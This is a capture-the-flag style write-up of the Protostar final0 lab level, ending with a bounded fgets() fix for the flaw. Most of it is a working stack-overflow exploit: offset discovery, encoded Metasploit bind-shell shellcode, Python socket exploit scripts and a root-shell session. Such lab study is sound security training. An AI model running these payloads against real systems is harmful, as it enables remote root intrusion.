Protostar final0

Published: 2020-07-30 11:30:34  Source: web  Views: 1446  Author: terrying  Column: Security technology

Hints: depending on where you are returning to, you may wish to use a toupper() proof shellcode.

Source code
#include "../common/common.c"

#define NAME "final0"
#define UID 0
#define GID 0
#define PORT 2995

/*
 * Read the username in from the network
 */

char *get_username()
{
    char buffer[512];
    char *q;
    int i;

    memset(buffer, 0, sizeof(buffer));
    gets(buffer);               /* unbounded read into a 512-byte stack buffer */

    /* Strip off trailing new line characters */
    q = strchr(buffer, '\n');
    if(q) *q = 0;
    q = strchr(buffer, '\r');
    if(q) *q = 0;

    /* Convert to upper case (the original comment said "lower case", but the call is toupper) */
    for(i = 0; i < strlen(buffer); i++) {
        buffer[i] = toupper(buffer[i]);
    }

    /* Duplicate the string and return it */
    return strdup(buffer);
}

int main(int argc, char **argv, char **envp)
{
    int fd;
    char *username;

    /* Run the process as a daemon */
    background_process(NAME, UID, GID);

    /* Wait for socket activity and return */
    fd = serve_forever(PORT);

    /* Set the client socket to STDIN, STDOUT, and STDERR */
    set_io(fd);

    username = get_username();

    printf("No such user %s\n", username);
}

At last we have reached the Final levels. T T

The hint tells us this is a stack overflow: the buffer in the challenge is only 512 bytes, so overflowing it lets us overwrite the saved return address (RET) and jump into shellcode we supply.
How do we find where RET sits? Follow these steps:
root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_create.rb 50
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab


#!/usr/bin/python
# Python 2 script (str is bytes here). Fill the 512-byte buffer exactly, then
# append a Metasploit cyclic pattern so the crash address reveals the RET offset.

from socket import *

s = socket(AF_INET, SOCK_STREAM)
s.connect(("192.168.0.71", 2995))

buffer = "a"*512                                               # fills the 512-byte stack buffer
exc = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab"     # output of pattern_create.rb 50

s.send(buffer+exc)
Run this from the client, then open the core dump left under /tmp with gdb to see which pattern bytes landed in RET:
root@protostar:/# gdb --quiet --core=/tmp/core.11.final0.2036
Core was generated by `/opt/protostar/bin/final0'.
Program terminated with signal 11, Segmentation fault.
#0 0x37614136 in ?? ()

root@bt:/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb 0x37614136
[*] Exact match at offset 20

So RET sits at offset 512+20 into the buffer.
To confirm this, send buffer="a"*532+"\xef\xbe\xad\xde" and the core dump should report the fault at address 0xdeadbeef. I will skip the confirmation here and be lazy...

Next we need shellcode; msfpayload generates it:
root@bt:~/Desktop/shellcode# msfpayload linux/x86/shell_bind_tcp R | msfencode -b '\x00\xff\x0d\x0a' -e x86/shikata_ga_nai -t c
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)

unsigned char buf[] =
"\xba\x5f\x74\xd6\x3c\xdb\xcd\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"
"\x14\x31\x56\x14\x03\x56\x14\x83\xc6\x04\xbd\x81\xe7\xe7\xb6"
"\x89\x5b\x5b\x6b\x24\x5e\xd2\x6a\x08\x38\x29\xec\x32\x9b\xe3"
"\x84\xc6\x23\x15\x08\xad\x33\x44\xe0\xb8\xd5\x0c\x66\xe3\xd8"
"\x51\xef\x52\xe7\xe2\xeb\xe4\x81\xc9\x73\x47\xfe\xb4\xbe\xc8"
"\x6d\x61\x2a\xf6\xc9\x5f\x2a\x41\x93\xa7\x42\x7d\x4c\x2b\xfa"
"\xe9\xbd\xa9\x93\x87\x48\xce\x33\x0b\xc2\xf0\x03\xa0\x19\x72";

Now place the shellcode right after the RET position and inspect the core dump to find the address the shellcode lands at:

#!/usr/bin/python
# Python 2 script (str is bytes here). Layout of the payload:
#   532 bytes of filler | RET marker 0xdeadbeef | NOP sled | shellcode
# The 0xdeadbeef marker makes the crash easy to recognise in the core dump.

from socket import *

s = socket(AF_INET, SOCK_STREAM)
s.connect(("192.168.0.71", 2995))

buffer = "a"*532                 # 512-byte buffer + 20 bytes up to RET
ret = "\xEF\xBE\xAD\xDE"         # 0xdeadbeef, little-endian
nop = "\x90"*20                  # NOP sled in front of the shellcode

#msfpayload linux/x86/shell_bind_tcp R | msfencode -b '\x00\xff\x0d\x0a' -e x86/shikata_ga_nai -t c
shellcode = "\xba\x5f\x74\xd6\x3c\xdb\xcd\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"\
"\x14\x31\x56\x14\x03\x56\x14\x83\xc6\x04\xbd\x81\xe7\xe7\xb6"\
"\x89\x5b\x5b\x6b\x24\x5e\xd2\x6a\x08\x38\x29\xec\x32\x9b\xe3"\
"\x84\xc6\x23\x15\x08\xad\x33\x44\xe0\xb8\xd5\x0c\x66\xe3\xd8"\
"\x51\xef\x52\xe7\xe2\xeb\xe4\x81\xc9\x73\x47\xfe\xb4\xbe\xc8"\
"\x6d\x61\x2a\xf6\xc9\x5f\x2a\x41\x93\xa7\x42\x7d\x4c\x2b\xfa"\
"\xe9\xbd\xa9\x93\x87\x48\xce\x33\x0b\xc2\xf0\x03\xa0\x19\x72"

s.send(buffer + ret + nop + shellcode)

Open the core file under /tmp with gdb:

root@protostar:/# gdb --quiet --core=/tmp/core.11.final0.2052
Core was generated by `/opt/protostar/bin/final0'.
Program terminated with signal 11, Segmentation fault.
#0 0xdeadbeef in ?? ()
(gdb) x/100x 0xbffffc00
0xbffffc00: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc10: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc20: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc30: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc40: 0x41414141 0x41414141 0x00000000 0x00000200
0xbffffc50: 0x61616161 0x61616161 0x61616161 0xdeadbeef
0xbffffc60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffc70: 0x90909090 0xd6745fba 0xd9cddb3c 0x5ef42474
0xbffffc80: 0x14b1c931 0x03145631 0xc6831456 0xe781bd04
0xbffffc90: 0x5b89b6e7 0x5e246b5b 0x38086ad2 0x9b32ec29
0xbffffca0: 0x23c684e3 0x33ad0815 0xd5b8e044 0xd8e3660c
0xbffffcb0: 0xe752ef51 0x81e4ebe2 0xfe4773c9 0x6dc8beb4

The target address is 0xbffffc60.
Now we have the RET offset and the shellcode address; the only thing missing is to put it all together..

#!/usr/bin/python
# Python 2 script (str is bytes here). Same layout as before, but RET now
# points at the NOP sled address found in the core dump (0xbffffc60).

from socket import *

s = socket(AF_INET, SOCK_STREAM)
s.connect(("192.168.0.71", 2995))

buffer = "a"*532                 # 512-byte buffer + 20 bytes up to RET
ret = "\x60\xfc\xff\xbf"         # 0xbffffc60, little-endian: start of the NOP sled
nop = "\x90"*20                  # NOP sled in front of the shellcode

#msfpayload linux/x86/shell_bind_tcp R | msfencode -b '\x00\xff\x0d\x0a' -e x86/shikata_ga_nai -t c
shellcode = "\xba\x5f\x74\xd6\x3c\xdb\xcd\xd9\x74\x24\xf4\x5e\x31\xc9\xb1"\
"\x14\x31\x56\x14\x03\x56\x14\x83\xc6\x04\xbd\x81\xe7\xe7\xb6"\
"\x89\x5b\x5b\x6b\x24\x5e\xd2\x6a\x08\x38\x29\xec\x32\x9b\xe3"\
"\x84\xc6\x23\x15\x08\xad\x33\x44\xe0\xb8\xd5\x0c\x66\xe3\xd8"\
"\x51\xef\x52\xe7\xe2\xeb\xe4\x81\xc9\x73\x47\xfe\xb4\xbe\xc8"\
"\x6d\x61\x2a\xf6\xc9\x5f\x2a\x41\x93\xa7\x42\x7d\x4c\x2b\xfa"\
"\xe9\xbd\xa9\x93\x87\x48\xce\x33\x0b\xc2\xf0\x03\xa0\x19\x72"

s.send(buffer + ret + nop + shellcode)

Connect from another client to port 4444 (the default bind port):

D:\>nc 192.168.0.71 4444
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
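The root cause of this level is the unbounded gets() into a 512-byte stack buffer. As an added example (not part of the Protostar source or of this writeup), here is the same get_username() rewritten with a bounded fgets() read; the function takes a FILE* so it can be exercised on in-memory input, and the two helpers below it exist only to test it.

```c
#define _GNU_SOURCE            /* strdup() and fmemopen() on glibc */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bounded replacement for final0's get_username(): fgets() writes at most 511
 * bytes into the stack buffer; a line that does not fit is drained and rejected. */
char *get_username_safe(FILE *in)
{
    char buffer[512];                          /* same size as in final0 */
    size_t len, i;
    if (fgets(buffer, sizeof(buffer), in) == NULL)
        return NULL;                           /* EOF or read error */
    len = strlen(buffer);
    if (len > 0 && buffer[len - 1] != '\n') {  /* stopped before a newline */
        int c = fgetc(in);                     /* end of input, or overlong line? */
        if (c != EOF && c != '\n') {
            while (c != EOF && c != '\n')      /* drain the rest of the line */
                c = fgetc(in);
            return NULL;
        }
    }
    /* Strip CR/LF, then upper-case using a length computed once. */
    while (len > 0 && (buffer[len - 1] == '\n' || buffer[len - 1] == '\r'))
        buffer[--len] = '\0';
    for (i = 0; i < len; i++)
        buffer[i] = (char)toupper((unsigned char)buffer[i]);
    return strdup(buffer);
}
/* Test helper: run get_username_safe() over an in-memory string. */
char *username_from_string(const char *input)
{
    FILE *fp = fmemopen((void *)input, strlen(input), "r");
    char *u = fp ? get_username_safe(fp) : NULL;
    if (fp) fclose(fp);
    return u;
}
/* Test helper: n bytes of 'a' plus "\n"; returns the accepted length or -1. */
int username_len_for(size_t n)
{
    char *input = malloc(n + 2), *u;
    int result = -1;
    if (!input) return -2;
    memset(input, 'a', n);
    input[n] = '\n'; input[n + 1] = '\0';
    if ((u = username_from_string(input)) != NULL) { result = (int)strlen(u); free(u); }
    free(input);
    return result;
}
```

A 532-byte line like the one used in the walkthrough is rejected instead of overwriting the saved return address, while a 511-byte line still fits.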


